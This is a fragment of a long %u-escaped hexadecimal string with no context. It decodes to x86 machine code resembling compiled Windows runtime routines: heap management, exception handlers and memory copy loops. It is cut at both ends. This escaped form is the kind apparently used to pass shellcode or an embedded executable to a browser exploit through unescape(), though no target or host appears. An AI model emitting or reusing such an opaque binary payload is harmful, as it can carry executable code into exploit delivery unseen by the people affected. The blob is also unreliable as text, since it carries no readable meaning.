0000%u8380%u20fe%u1973%uce8b%uebd3%u748d%u0406%ud3f7%u5c21%u4490%u0efe%u2375%u4d8b%u2108%ueb19%u8d1c%ue04e%uebd3%u4c8d%u0406%ud3f7%u9c21%uc490%u0000%ufe00%u7509%u8b06%u084d%u5921%u8b04%u0c5d%u4f8b%u8b08%u0477%u7189%u8b04%u0877%u4f8b%u8904%u0871%u758b%u0310%ufc75%u7589%uc110%u04fe%u834e%u3ffe%u0376%u3f6a%u8b5e%uf44d%u0c8d%u8bf1%u0479%u4b89%u8908%u047b%u5989%u8b04%u044b%u5989%u8b08%u044b%u4b3b%u7508%u8a57%u064c%u8804%u0f4d%uc1fe%u4c88%u0406%ufe83%u7320%u801c%u0f7d%u7500%u8b0e%ubfce%u0000%u8000%uefd3%u4d8b%u0908%u8d39%u9044%u8b44%uebce%u8020%u0f7d%u7500%u8d10%ue04e%u00bf%u0000%ud380%u8bef%u084d%u7909%u8d04%u9084%u00c4%u0000%u4e8d%ubae0%u0000%u8000%uead3%u1009%u458b%u8910%u8903%u1844%u33fc%u40c0%u5e5f%uc95b%u8bc3%u55ff%uec8b%uec83%ua114%ub6b4%u0040%u4d8b%u6b08%u14c0%u0503%ub6b8%u0040%uc183%u8317%uf0e1%u4d89%uc1f0%u04f9%u4953%uf983%u5620%u7d57%u830b%uffce%ueed3%u4d83%ufff8%u0deb%uc183%u83e0%uffca%uf633%uead3%u5589%u8bf8%uc00d%u40b6%u8b00%uebd9%u8b11%u0453%u3b8b%u5523%u23f8%u0bfe%u75d7%u830a%u14c3%u5d89%u3b08%u72d8%u3be8%u75d8%u8b7f%ub81d%u40b6%ueb00%u8b11%u0453%u3b8b%u5523%u23f8%u0bfe%u75d7%u830a%u14c3%u5d89%u3b08%u72d9%u3be8%u75d9%ueb5b%u830c%u087b%u7500%u830a%u14c3%u5d89%u3b08%u72d8%u3bf0%u75d8%u8b31%ub81d%u40b6%ueb00%u8309%u087b%u7500%u830a%u14c3%u5d89%u3b08%u72d9%u3bf0%u75d9%ue815%ufaa0%uffff%ud88b%u5d89%u8508%u75db%u3307%ue9c0%u0209%u0000%ue853%ufb3a%uffff%u8b59%u104b%u0189%u438b%u8310%uff38%ue574%u1d89%ub6c0%u0040%u438b%u8b10%u8910%ufc55%ufa83%u74ff%u8b14%u908c%u00c4%u0000%u7c8b%u4490%u4d23%u23f8%u0bfe%u75cf%u8329%ufc65%u8b00%uc490%u0000%u8d00%u4448%u398b%u5523%u23f8%u0bfe%u75d7%uff0e%ufc45%u918b%u0084%u0000%uc183%ueb04%u8be7%ufc55%uca8b%uc969%u0204%u0000%u8c8d%u4401%u0001%u8900%uf44d%u4c8b%u4490%uff33%uce23%u1275%u8c8b%uc490%u0000%u2300%uf84d%u206a%ueb5f%u0303%u47c9%uc985%uf97d%u4d8b%u8bf4%uf954%u8b04%u2b0a%uf04d%uf18b%ufec1%u4e04%ufe83%u893f%uf84d%u037e%u3f6a%u3b5e%u0ff7%u0184%u0001%u8b00%u044a%u4a3b%u7508%u835c%u20ff%u00bb%u0000%u7d80%u8b26%ud3cf%u8beb%ufc4d%u7c8d%u0438%ud3f7%u5d89%u23ec%u885c%u8944%u885c%ufe44%u750f%u8b33%uec4d%u5d8b%u2108%ueb0b%u8d2c%ue04f%uebd3%u4d8b%u8dfc%u888c%u00c4%u0000%u7c8d%u0438%ud3f7%u1921%u0ffe%u5d89%u75ec%u8b0b%u085d%u4d8b%u21ec%u044b%u03eb%u5d8b%u8308%uf87d%u8b00%u084a%u7a8b%u8904%u0479%u4a8b%u8b04%u087a%u7989%u0f08%u8d84%u0000%u8b00%uf44d%u0c8d%u8bf1%u0479%u4a89%u8908%u047a%u5189%u8b04%u044a%u5189%u8b08%u044a%u4a3b%u7508%u8a5e%u064c%u8804%u0b4d%uc1fe%ufe83%u8820%u064c%u7d04%u8023%u0b7d%u7500%ubf0b%u0000%u8000%uce8b%uefd3%u3b09%uce8b%u00bf%u0000%ud380%u8bef%ufc4d%u7c09%u4488%u29eb%u7d80%u000b%u0d75%u4e8d%ubfe0%u0000%u8000%uefd3%u7b09%u8b04%ufc4d%ubc8d%uc488%u0000%u8d00%ue04e%u00be%u0000%ud380%u09ee%u8b37%uf84d%uc985%u0b74%u0a89%u4c89%ufc11%u03eb%u4d8b%u8bf8%uf075%ud103%u4e8d%u8901%u890a%u324c%u8bfc%uf475%u0e8b%u798d%u8901%u853e%u75c9%u3b1a%uc41d%u40b2%u7500%u8b12%ufc4d%u0d3b%ub6c8%u0040%u0775%u2583%ub2c4%u0040%u8b00%ufc4d%u0889%u428d%u5f04%u5b5e%uc3c9%ucccc%u5653%u8b57%u2454%u8b10%u2444%u8b14%u244c%u5518%u5052%u5151%u1868%u4068%u6400%u35ff%u0000%u0000%ub4a1%u40a8%u3300%u89c4%u2444%u6408%u2589%u0000%u0000%u448b%u3024%u588b%u8b08%u244c%u332c%u8b19%u0c70%ufe83%u74fe%u8b3b%u2454%u8334%ufefa%u0474%uf23b%u2e76%u348d%u8d76%ub35c%u8b10%u890b%u0c48%u7b83%u0004%ucc75%u0168%u0001%u8b00%u0843%u02e8%u0012%ub900%u0001%u0000%u438b%ue808%u1214%u0000%ub0eb%u8f64%u0005%u0000%u8300%u18c4%u5e5f%uc35b%u4c8b%u0424%u41f7%u0604%u0000%ub800%u0001%u0000%u3374%u448b%u0824%u488b%u3308%ue8c8%udb82%uffff%u8b55%u1868%u70ff%uff0c%u1070%u70ff%ue814%uff3e%uffff%uc483%u5d0c%u448b%u0824%u548b%u1024%u0289%u03b8%u0000%uc300%u8b55%u244c%u8b08%uff29%u1c71%u71ff%uff18%u2871%u15e8%uffff%u83ff%u0cc4%uc25d%u0004%u5655%u5357%uea8b%uc033%udb33%ud233%uf633%uff33%ud1ff%u5f5b%u5d5e%u8bc3%u8bea%u8bf1%u6ac1%ue801%u115f%u0000%uc033%udb33%uc933%ud233%uff33%ue6ff%u8b55%u53ec%u5756%u006a%u006a%ubf68%u4068%u5100%ue5e8%u0015%u5f00%u5b5e%uc35d%u8b55%u246c%u5208%uff51%u2474%ue814%ufeb4%uffff%uc483%u5d0c%u08c2%u8b00%u55ff%uec8b%uec81%u0328%u0000%ud0a3%u40b3%u8900%ucc0d%u40b3%u8900%uc815%u40b3%u8900%uc41d%u40b3%u8900%uc035%u40b3%u8900%ubc3d%u40b3%u6600%u158c%ub3e8%u0040%u8c66%udc0d%u40b3%u6600%u1d8c%ub3b8%u0040%u8c66%ub405%u40b3%u6600%u258c%ub3b0%u0040%u8c66%uac2d%u40b3%u9c00%u058f%ub3e0%u0040%u458b%ua300%ub3d4%u0040%u458b%ua304%ub3d8%u0040%u458d%ua308%ub3e4%u0040%u858b%ufce0%uffff%u05c7%ub320%u0040%u0001%u0001%ud8a1%u40b3%ua300%ub2d4%u0040%u05c7%ub2c8%u0040%u0409%uc000%u05c7%ub2cc%u0040%u0001%u0000%ub4a1%u40a8%u8900%ud885%ufffc%ua1ff%ua8b8%u0040%u8589%ufcdc%uffff%u15ff%u802c%u0040%u18a3%u40b3%u6a00%ue801%uda0a%uffff%u6a59%uff00%u7815%u4080%u6800%u927c%u0040%u15ff%u8074%u0040%u3d83%ub318%u0040%u7500%u6a08%ue801%ud9e6%uffff%u6859%u0409%uc000%u15ff%u8070%u0040%uff50%u6c15%u4080%uc900%u55c3%uec8b%uec83%u8904%ufc7d%u7d8b%u8b08%u0c4d%ue9c1%u6607%uef0f%uebc0%u8d08%u24a4%u0000%u0000%u6690%u7f0f%u6607%u7f0f%u1047%u0f66%u477f%u6620%u7f0f%u3047%u0f66%u477f%u6640%u7f0f%u5047%u0f66%u477f%u6660%u7f0f%u7047%ubf8d%u0080%u0000%u7549%u8bd0%ufc7d%ue58b%uc35d%u8b55%u83ec%u10ec%u7d89%u8bfc%u0845%u8b99%u33f8%u2bfa%u83fa%u0fe7%ufa33%ufa2b%uff85%u3c75%u4d8b%u8b10%u83d1%u7fe2%u5589%u3bf4%u74ca%u2b12%u51ca%ue850%uff73%uffff%uc483%u8b08%u0845%u558b%u85f4%u74d2%u0345%u1045%uc22b%u4589%u33f8%u8bc0%uf87d%u4d8b%uf3f4%u8baa%u0845%u2eeb%udff7%uc783%u8910%uf07d%uc033%u7d8b%u8b08%uf04d%uaaf3%u458b%u8bf0%u084d%u558b%u0310%u2bc8%u52d0%u006a%ue851%uff7e%uffff%uc483%u8b0c%u0845%u7d8b%u8bfc%u5de5%u6ac3%u680c%u9750%u0040%u5de8%uffd6%u83ff%ufc65%u6600%u280f%uc7c1%ue445%u0001%u0000%u23eb%u458b%u8bec%u8b00%u3d00%u0005%uc000%u0a74%u1d3d%u0000%u74c0%u3303%uc3c0%uc033%uc340%u658b%u83e8%ue465%uc700%ufc45%ufffe%uffff%u458b%ue8e4%ud65f%uffff%u8bc3%u55ff%uec8b%uec83%u3318%u53c0%u4589%u89fc%uf445%u4589%u53f8%u589c%uc88b%u0035%u2000%u5000%u9c9d%u2b5a%u74d1%u511f%u339d%u0fc0%u89a2%uf445%u5d89%u89e8%uec55%u4d89%ub8f0%u0001%u0000%ua20f%u5589%u89fc%uf845%uf75b%ufc45%u0000%u0400%u0e74%u5ce8%uffff%u85ff%u74c0%u3305%u40c0%u02eb%uc033%uc95b%ue8c3%uff99%uffff%ub0a3%u40b6%u3300%uc3c0%uff8b%u8b55%u83ec%u0cec%ub4a1%u40a8%u3300%u89c5%ufc45%u066a%u458d%u50f4%u0468%u0010%uff00%u0875%u45c6%u00fa%u15ff%u8114%u0040%uc085%u0575%uc883%uebff%u8d0a%uf445%ue850%u07e5%u0000%u8b59%ufc4d%ucd33%uede8%uffd7%uc9ff%u8bc3%u55ff%uec8b%uec83%ua134%ua8b4%u0040%uc533%u4589%u8bfc%u1045%u4d8b%u8918%ud845%u458b%u5314%u4589%u8bd0%u5600%u4589%u8bdc%u0845%u3357%u89ff%ucc4d%u7d89%u89e0%ud47d%u453b%u0f0c%u5f84%u0001%u8b00%u7c35%u4080%u8d00%ue84d%u5051%ud6ff%u1d8b%u80fc%u0040%uc085%u5e74%u7d83%u01e8%u5875%u458d%u50e8%u75ff%uff0c%u85d6%u74c0%u834b%ue87d%u7501%u8b45%udc75%u45c7%u01d4%u0000%u8300%ufffe%u0c75%u75ff%ue8d8%ue7aa%uffff%uf08b%u4659%uf73b%u5b7e%ufe81%ufff0%u7fff%u5377%u448d%u0836%u003d%u0004%u7700%ue82f%u022a%u0000%uc48b%uc73b%u3874%u00c7%ucccc%u0000%u2deb%u5757%u75ff%uffdc%ud875%u016a%u75ff%uff08%u8bd3%u3bf0%u75f7%u33c3%ue9c0%u00d1%u0000%ue850%u012c%u0000%u3b59%u74c7%uc709%udd00%u00dd%u8300%u08c0%u4589%uebe4%u8903%ue47d%u7d39%u74e4%u8dd8%u3604%u5750%u75ff%ue8e4%ud702%uffff%uc483%u560c%u75ff%uffe4%udc75%u75ff%u6ad8%uff01%u0875%ud3ff%uc085%u7f74%u5d8b%u3bcc%u74df%u571d%uff57%u1c75%u5653%u75ff%u57e4%u75ff%uff0c%uc415%u4080%u8500%u74c0%u8960%ue05d%u5beb%u1d8b%u80c4%u0040%u7d39%u75d4%u5714%u5757%u5657%u75ff%u57e4%u75ff%uff0c%u8bd3%u3bf0%u74f7%u563c%u016a%ua1e8%uffdf%u59ff%u8959%ue045%uc73b%u2b74%u5757%u5056%uff56%ue475%uff57%u0c75%ud3ff%uc73b%u0e75%u75ff%ue8e0%udeab%uffff%u8959%ue07d%u0beb%u7d83%uffdc%u0574%u4d8b%u89d0%uff01%ue475%udde8%uffd6%u59ff%u458b%u8de0%uc065%u5e5f%u8b5b%ufc4d%ucd33%u39e8%uffd6%uc9ff%u6ac3%u680c%u9770%u0040%ua1e8%uffd3%u83ff%ue465%u8b00%u0875%u353b%ub6bc%u0040%u2277%u046a%u27e8%uffde%u59ff%u6583%u00fc%ue856%uf6f1%uffff%u8959%ue445%u45c7%ufefc%uffff%ue8ff%u0009%u0000%u458b%ue8e4%ud3ad%uffff%u6ac3%ue804%udd22%uffff%uc359%uff8b%u8b55%u56ec%u758b%u8308%ue0fe%u870f%u00a1%u0000%u5753%u3d8b%u8060%u0040%u3d83%ub11c%u0040%u7500%ue818%uca61%uffff%u1e6a%uafe8%uffc8%u68ff%u00ff%u0000%uf1e8%uffc5%u59ff%ua159%ub6d4%u0040%uf883%u7501%u850e%u74f6%u8b04%uebc6%u3303%u40c0%ueb50%u831c%u03f8%u0b75%ue856%uff53%uffff%u8559%u75c0%u8516%u75f6%u4601%uc683%u830f%uf0e6%u6a56%uff00%u1c35%u40b1%uff00%u8bd7%u85d8%u75db%u6a2e%u5e0c%u0539%ub6a8%u0040%u1574%u75ff%ue808%uec17%uffff%u8559%u74c0%u8b0f%u0875%u7be9%uffff%ue8ff%ub392%uffff%u3089%u8be8%uffb3%u89ff%u5f30%uc38b%ueb5b%u5614%uf0e8%uffeb%u59ff%u77e8%uffb3%uc7ff%u0c00%u0000%u3300%u5ec0%uc35d%ucccc%ucccc%u8d51%u244c%u2b08%u83c8%u0fe1%uc103%uc91b%uc10b%ue959%u0b6a%u0000%u8d51%u244c%u2b08%u83c8%u07e1%uc103%uc91b%uc10b%ue959%u0b54%u0000%u0c6a%u9068%u4097%ue800%ud258%uffff%u4d8b%u3308%u3bff%u76cf%u6a2e%u58e0%ud233%uf1f7%u453b%u1b0c%u40c0%u1f75%u13e8%uffb3%uc7ff%u0c00%u0000%u5700%u5757%u5757%u9be8%uffb2%u83ff%u14c4%uc033%ud5e9%u0000%u0f00%u4daf%u8b0c%u89f1%u0875%uf73b%u0375%uf633%u3346%u89db%ue45d%ufe83%u77e0%u8369%ud43d%u40b6%u0300%u4b75%uc683%u830f%uf0e6%u7589%u8b0c%u0845%u053b%ub6bc%u0040%u3777%u046a%u7fe8%uffdc%u59ff%u7d89%ufffc%u0875%u48e8%ufff5%u59ff%u4589%uc7e4%ufc45%ufffe%uffff%u5fe8%u0000%u8b00%ue45d%udf3b%u1174%u75ff%u5708%ue853%ud456%uffff%uc483%u3b0c%u75df%u5661%u086a%u35ff%ub11c%u0040%u15ff%u8060%u0040%ud88b%udf3b%u4c75%u3d39%ub6a8%u0040%u3374%ue856%uead7%uffff%u8559%u0fc0%u7285%uffff%u8bff%u1045%uc73b%u840f%uff50%uffff%u00c7%u000c%u0000%u45e9%uffff%u33ff%u8bff%u0c75%u046a%u23e8%uffdb%u59ff%u3bc3%u75df%u8b0d%u1045%uc73b%u0674%u00c7%u000c%u0000%uc38b%u8ce8%uffd1%uc3ff%u106a%ub068%u4097%ue800%ud13a%uffff%u5d8b%u8508%u75db%uff0e%u0c75%ucde8%ufffd%u59ff%ucce9%u0001%u8b00%u0c75%uf685%u0c75%ue853%udbe7%uffff%ue959%u01b7%u0000%u3d83%ub6d4%u0040%u0f03%u9385%u0001%u3300%u89ff%ue47d%ufe83%u0fe0%u8a87%u0001%u6a00%ue804%udb8c%uffff%u8959%ufc7d%ue853%uec78%uffff%u8959%ue045%uc73b%u840f%u009e%u0000%u353b%ub6bc%u0040%u4977%u5356%ue850%uf15a%uffff%uc483%u850c%u74c0%u8905%ue45d%u35eb%ue856%uf429%uffff%u8959%ue445%uc73b%u2774%u438b%u48fc%uc63b%u0272%uc68b%u5350%u75ff%ue8e4%udffc%uffff%ue853%uec28%uffff%u4589%u53e0%ue850%uec4e%uffff%uc483%u3918%ue47d%u4875%uf73b%u0675%uf633%u8946%u0c75%uc683%u830f%uf0e6%u7589%u560c%uff57%u1c35%u40b1%uff00%u6015%u4080%u8900%ue445%uc73b%u2074%u438b%u48fc%uc63b%u0272%uc68b%u5350%u75ff%ue8e4%udfa8%uffff%uff53%ue075%u01e8%uffec%u83ff%u14c4%u45c7%ufefc%uffff%ue8ff%u002e%u0000%u7d83%u00e0%u3175%uf685%u0175%u8346%u0fc6%ue683%u89f0%u0c75%u5356%u006a%u35ff%ub11c%u0040%u15ff%u8058%u0040%uf88b%u12eb%u758b%u8b0c%u085d%u046a%ubde8%uffd9%u59ff%u8bc3%ue47d%uff85%u850f%u00bf%u0000%u3d39%ub6a8%u0040%u2c74%ue856%ue92b%uffff%u8559%u0fc0%ud285%ufffe%ue8ff%ub0aa%uffff%u7d39%u75e0%u8b6c%ufff0%u1815%u4080%u5000%u55e8%uffb0%u59ff%u0689%u5feb%uff85%u850f%u0083%u0000%u85e8%uffb0%u39ff%ue07d%u6874%u00c7%u000c%u0000%u71eb%uf685%u0175%u5646%u6a53%uff00%u1c35%u40b1%uff00%u5815%u4080%u8b00%u85f8%u75ff%u3956%ua805%u40b6%u7400%u5634%uc2e8%uffe8%u59ff%uc085%u1f74%ufe83%u76e0%u56cd%ub2e8%uffe8%u59ff%u39e8%uffb0%uc7ff%u0c00%u0000%u3300%ue8c0%ucf99%uffff%ue8c3%ub026%uffff%u7ce9%uffff%u85ff%u75ff%ue816%ub018%uffff%uf08b%u15ff%u8018%u0040%ue850%uafc8%uffff%u0689%u8b59%uebc7%u8bd2%u55ff%uec8b%uec83%uff10%u0c75%u4d8d%ue8f0%uab07%uffff%ub60f%u0845%u4d8b%u8bf0%uc889%u0000%u0f00%u04b7%u2541%u8000%u0000%u7d80%u00fc%u0774%u4d8b%u83f8%u7061%uc9fd%u55c3%uec8b%uec83%u8908%ufc7d%u7589%u8bf8%u0c75%u7d8b%u8b08%u104d%ue9c1%ueb07%u8d06%u009b%u0000%u6600%u6f0f%u6606%u6f0f%u104e%u0f66%u566f%u6620%u6f0f%u305e%u0f66%u077f%u0f66%u4f7f%u6610%u7f0f%u2057%u0f66%u5f7f%u6630%u6f0f%u4066%u0f66%u6e6f%u6650%u6f0f%u6076%u0f66%u7e6f%u6670%u7f0f%u4067%u0f66%u6f7f%u6650%u7f0f%u6077%u0f66%u7f7f%u8d70%u80b6%u0000%u8d00%u80bf%u0000%u4900%ua375%u758b%u8bf8%ufc7d%ue58b%uc35d%u8b55%u83ec%u1cec%u7d89%u89f4%uf875%u5d89%u8bfc%u0c5d%uc38b%u8b99%u8bc8%u0845%uca33%uca2b%ue183%u330f%u2bca%u99ca%uf88b%ufa33%ufa2b%ue783%u330f%u2bfa%u8bfa%u0bd1%u75d7%u8b4a%u1075%uce8b%ue183%u897f%ue84d%uf13b%u1374%uf12b%u5356%ue850%uff27%uffff%uc483%u8b0c%u0845%u4d8b%u85e8%u74c9%u8b77%u105d%u558b%u030c%u2bd3%u89d1%uec55%ud803%ud92b%u5d89%u8bf0%uec75%u7d8b%u8bf0%ue84d%ua4f3%u458b%ueb08%u3b53%u75cf%uf735%u83d9%u10c1%u4d89%u8be4%u0c75%u7d8b%u8b08%ue44d%ua4f3%u4d8b%u0308%ue44d%u558b%u030c%ue455%u458b%u2b10%ue445%u5250%ue851%uff4c%uffff%uc483%u8b0c%u0845%u1aeb%u758b%u8b0c%u087d%u4d8b%u8b10%uc1d1%u02e9%ua5f3%uca8b%ue183%uf303%u8ba4%u0845%u5d8b%u8bfc%uf875%u7d8b%u8bf4%u5de5%u8bc3%u55ff%uec8b%u0a6a%u006a%u75ff%ue808%u08c2%u0000%uc483%u5d0c%u8bc3%u55ff%uec8b%uec81%u0328%u0000%ub4a1%u40a8%u3300%u89c5%ufc45%u05f6%uabd0%u0040%u5601%u0874%u0a6a%ucde8%uffc2%u59ff%u39e8%uffe4%u85ff%u74c0%u6a08%ue816%ue43b%uffff%uf659%ud005%u40ab%u0200%u840f%u00ca%u0000%u8589%ufde0%uffff%u8d89%ufddc%uffff%u9589%ufdd8%uffff%u9d89%ufdd4%uffff%ub589%ufdd0%uffff%ubd89%ufdcc%uffff%u8c66%uf895%ufffd%u66ff%u8d8c%ufdec%uffff%u8c66%uc89d%ufffd%u66ff%u858c%ufdc4%uffff%u8c66%uc0a5%ufffd%u66ff%uad8c%ufdbc%uffff%u8f9c%uf085%ufffd%u8bff%u0475%u458d%u8904%uf485%ufffd%uc7ff%u3085%ufffd%u01ff%u0100%u8900%ue8b5%ufffd%u8bff%ufc40%u506a%u8589%ufde4%uffff%u858d%ufcd8%uffff%u006a%ue850%ucf44%uffff%u858d%ufcd8%uffff%uc483%u890c%u2885%ufffd%u8dff%u3085%ufffd%u6aff%uc700%ud885%ufffc%u15ff%u0000%u8940%ue4b5%ufffc%u89ff%u2c85%ufffd%uffff%u7815%u4080%u8d00%u2885%ufffd%u50ff%u15ff%u8074%u0040%u036a%u5be8%uffc1%uccff%u106a%ud068%u4097%ue800%ucc50%uffff%uc033%u5d8b%u3308%u3bff%u0fdf%uc095%uc73b%u1d75%u13e8%uffad%uc7ff%u1600%u0000%u5700%u5757%u5757%u9be8%uffac%u83ff%u14c4%uc883%uebff%u8353%ud43d%u40b6%u0300%u3875%u046a%uafe8%uffd6%u59ff%u7d89%u53fc%u9be8%uffe7%u59ff%u4589%u3be0%u74c7%u8b0b%ufc73%uee83%u8909%ue475%u03eb%u758b%uc7e4%ufc45%ufffe%uffff%u25e8%u0000%u3900%ue07d%u1075%u5753%u35ff%ub11c%u0040%u15ff%u8050%u0040%uf08b%uc68b%u10e8%uffcc%uc3ff%uff33%u5d8b%u8b08%ue475%u046a%u7de8%uffd5%u59ff%u6ac3%ue802%ube2a%uffff%uc359%u8b55%u57ec%u8b56%u0c75%u4d8b%u8b10%u087d%uc18b%ud18b%uc603%ufe3b%u0876%uf83b%u820f%u01a4%u0000%uf981%u0100%u0000%u1f72%u3d83%ub6b0%u0040%u7400%u5716%u8356%u0fe7%ue683%u3b0f%u5efe%u755f%u5e08%u5d5f%ufde9%ufffc%uf7ff%u03c7%u0000%u7500%uc115%u02e9%ue283%u8303%u08f9%u2a72%ua5f3%u24ff%uf495%u4076%u9000%uc78b%u03ba%u0000%u8300%u04e9%u0c72%ue083%u0303%uffc8%u8524%u7608%u0040%u24ff%u048d%u4077%u9000%u24ff%u888d%u4076%u9000%u7618%u0040%u7644%u0040%u7668%u0040%ud123%u068a%u0788%u468a%u8801%u0147%u468a%uc102%u02e9%u4788%u8302%u03c6%uc783%u8303%u08f9%ucc72%ua5f3%u24ff%uf495%u4076%u8d00%u0049%ud123%u068a%u0788%u468a%uc101%u02e9%u4788%u8301%u02c6%uc783%u8302%u08f9%ua672%ua5f3%u24ff%uf495%u4076%u9000%ud123%u068a%u0788%uc683%uc101%u02e9%uc783%u8301%u08f9%u8872%ua5f3%u24ff%uf495%u4076%u8d00%u0049%u76eb%u0040%u76d8%u0040%u76d0%u0040%u76c8%u0040%u76c0%u0040%u76b8%u0040%u76b0%u0040%u76a8%u0040%u448b%ue48e%u4489%ue48f%u448b%ue88e%u4489%ue88f%u448b%uec8e%u4489%uec8f%u448b%uf08e%u4489%uf08f%u448b%uf48e%u4489%uf48f%u448b%uf88e%u4489%uf88f%u448b%ufc8e%u4489%ufc8f%u048d%u008d%u0000%u0300%u03f0%ufff8%u9524%u76f4%u0040%uff8b%u7704%u0040%u770c%u0040%u7718%u0040%u772c%u0040%u458b%u5e08%uc95f%u90c3%u068a%u0788%u458b%u5e08%uc95f%u90c3%u068a%u0788%u468a%u8801%u0147%u458b%u5e08%uc95f%u8dc3%u0049%u068a%u0788%u468a%u8801%u0147%u468a%u8802%u0247%u458b%u5e08%uc95f%u90c3%u748d%ufc31%u7c8d%ufc39%uc7f7%u0003%u0000%u2475%ue9c1%u8302%u03e2%uf983%u7208%ufd0d%ua5f3%ufffc%u9524%u7890%u0040%uff8b%ud9f7%u24ff%u408d%u4078%u8d00%u0049%uc78b%u03ba%u0000%u8300%u04f9%u0c72%ue083%u2b03%uffc8%u8524%u7794%u0040%u24ff%u908d%u4078%u9000%u77a4%u0040%u77c8%u0040%u77f0%u0040%u468a%u2303%u88d1%u0347%uee83%uc101%u02e9%uef83%u8301%u08f9%ub272%uf3fd%ufca5%u24ff%u9095%u4078%u8d00%u0049%u468a%u2303%u88d1%u0347%u468a%uc102%u02e9%u4788%u8302%u02ee%uef83%u8302%u08f9%u8872%uf3fd%ufca5%u24ff%u9095%u4078%u9000%u468a%u2303%u88d1%u0347%u468a%u8802%u0247%u468a%uc101%u02e9%u4788%u8301%u03ee%uef83%u8303%u08f9%u820f%uff56%uffff%uf3fd%ufca5%u24ff%u9095%u4078%u8d00%u0049%u7844%u0040%u784c%u0040%u7854%u0040%u785c%u0040%u7864%u0040%u786c%u0040%u7874%u0040%u7887%u0040%u448b%u1c8e%u4489%u1c8f%u448b%u188e%u4489%u188f%u448b%u148e%u4489%u148f%u448b%u108e%u4489%u108f%u448b%u0c8e%u4489%u0c8f%u448b%u088e%u4489%u088f%u448b%u048e%u4489%u048f%u048d%u008d%u0000%u0300%u03f0%ufff8%u9524%u7890%u0040%uff8b%u78a0%u0040%u78a8%u0040%u78b8%u0040%u78cc%u0040%u458b%u5e08%uc95f%u90c3%u468a%u8803%u0347%u458b%u5e08%uc95f%u8dc3%u0049%u468a%u8803%u0347%u468a%u8802%u0247%u458b%u5e08%uc95f%u90c3%u468a%u8803%u0347%u468a%u8802%u0247%u468a%u8801%u0147%u458b%u5e08%uc95f%uccc3%ucccc%u8b55%u53ec%u5756%u6a55%u6a00%u6800%u7900%u0040%u75ff%ue808%u05a4%u0000%u5f5d%u5b5e%ue58b%uc35d%u4c8b%u0424%u41f7%u0604%u0000%ub800%u0001%u0000%u3274%u448b%u1424%u488b%u33fc%ue8c8%uca92%uffff%u8b55%u1068%u508b%u5228%u508b%u5224%u14e8%u0000%u8300%u08c4%u8b5d%u2444%u8b08%u2454%u8910%ub802%u0003%u0000%u53c3%u5756%u448b%u1024%u5055%ufe6a%u0868%u4079%u6400%u35ff%u0000%u0000%ub4a1%u40a8%u3300%u50c4%u448d%u0424%ua364%u0000%u0000%u448b%u2824%u588b%u8b08%u0c70%ufe83%u74ff%u833a%u247c%uff2c%u0674%u743b%u2c24%u2d76%u348d%u8b76%ub30c%u4c89%u0c24%u4889%u830c%ub37c%u0004%u1775%u0168%u0001%u8b00%ub344%ue808%u0049%u0000%u448b%u08b3%u5fe8%u0000%ueb00%u8bb7%u244c%u6404%u0d89%u0000%u0000%uc483%u5f18%u5b5e%u33c3%u64c0%u0d8b%u0000%u0000%u7981%u0804%u4079%u7500%u8b10%u0c51%u528b%u390c%u0851%u0575%u01b8%u0000%uc300%u5153%ue0bb%u40ab%ueb00%u530b%ubb51%uabe0%u0040%u4c8b%u0c24%u4b89%u8908%u0443%u6b89%u550c%u5051%u5958%u595d%uc25b%u0004%ud0ff%uccc3%u8d51%u244c%u2b04%u1bc8%uf7c0%u23d0%u8bc8%u25c4%uf000%uffff%uc83b%u0a72%uc18b%u9459%u008b%u0489%uc324%u002d%u0010%u8500%ueb00%u8be9%u55ff%uec8b%uec83%u5614%uff57%u0875%u4d8d%ue8ec%ua2bf%uffff%u458b%u8b10%u0c75%uff33%uc73b%u0274%u3089%uf73b%u2c75%u91e8%uffa7%u57ff%u5757%u5757%u00c7%u0016%u0000%u19e8%uffa7%u83ff%u14c4%u7d80%u00f8%u0774%u458b%u83f4%u7060%u33fd%ue9c0%u01d8%u0000%u7d39%u7414%u830c%u147d%u7c02%u83c9%u147d%u7f24%u8bc3%uec4d%u8a53%u891e%ufc7d%u7e8d%u8301%uacb9%u0000%u0100%u177e%u458d%u50ec%ub60f%u6ac3%u5008%ue2e8%u0002%u8b00%uec4d%uc483%ueb0c%u8b10%uc891%u0000%u0f00%uc3b6%ub70f%u4204%ue083%u8508%u74c0%u8a05%u471f%uc7eb%ufb80%u752d%u8306%u184d%ueb02%u8005%u2bfb%u0375%u1f8a%u8b47%u1445%uc085%u8c0f%u014b%u0000%uf883%u0f01%u4284%u0001%u8300%u24f8%u8f0f%u0139%u0000%uc085%u2a75%ufb80%u7430%uc709%u1445%u000a%u0000%u34eb%u078a%u783c%u0d74%u583c%u0974%u45c7%u0814%u0000%ueb00%uc721%u1445%u0010%u0000%u0aeb%uf883%u7510%u8013%u30fb%u0e75%u078a%u783c%u0474%u583c%u0475%u8a47%u471f%ub18b%u00c8%u0000%uffb8%uffff%u33ff%uf7d2%u1475%ub60f%u0fcb%u0cb7%uf64e%u04c1%u0874%ube0f%u83cb%u30e9%u1beb%uc1f7%u0103%u0000%u3174%ucb8a%ue980%u8061%u19f9%ube0f%u77cb%u8303%u20e9%uc183%u3bc9%u144d%u1973%u4d83%u0818%u4539%u72fc%u7527%u3b04%u76ca%u8321%u184d%u8304%u107d%u7500%u8b23%u1845%ua84f%u7508%u8320%u107d%u7400%u8b03%u0c7d%u6583%u00fc%u5beb%u5d8b%u0ffc%u5daf%u0314%u89d9%ufc5d%u1f8a%ueb47%ube8b%uffff%u7fff%u04a8%u1b75%u01a8%u3d75%ue083%u7402%u8109%ufc7d%u0000%u8000%u0977%uc085%u2b75%u7539%u76fc%ue826%ua5f0%uffff%u45f6%u0118%u00c7%u0022%u0000%u0674%u4d83%ufffc%u0feb%u45f6%u0218%u006a%u0f58%uc095%uc603%u4589%u8bfc%u1045%uc085%u0274%u3889%u45f6%u0218%u0374%u5df7%u80fc%uf87d%u7400%u8b07%uf445%u6083%ufd70%u458b%uebfc%u8b18%u1045%uc085%u0274%u3089%u7d80%u00f8%u0774%u458b%u83f4%u7060%u33fd%u5bc0%u5e5f%uc3c9%uff8b%u8b55%u33ec%u50c0%u75ff%uff10%u0c75%u75ff%u3908%u8c05%u40ac%u7500%u6807%ua790%u0040%u01eb%ue850%ufdab%uffff%uc483%u5d14%uccc3%ucccc%ucccc%ucccc%ucccc%ucccc%u8b55%u57ec%u5356%u4d8b%u0b10%u74c9%u8b4d%u0875%u7d8b%ub70c%ub341%ub65a%u8d20%u0049%u268a%ue40a%u078a%u2774%uc00a%u2374%uc683%u8301%u01c7%ue73a%u0672%ue33a%u0277%ue602%uc73a%u0672%uc33a%u0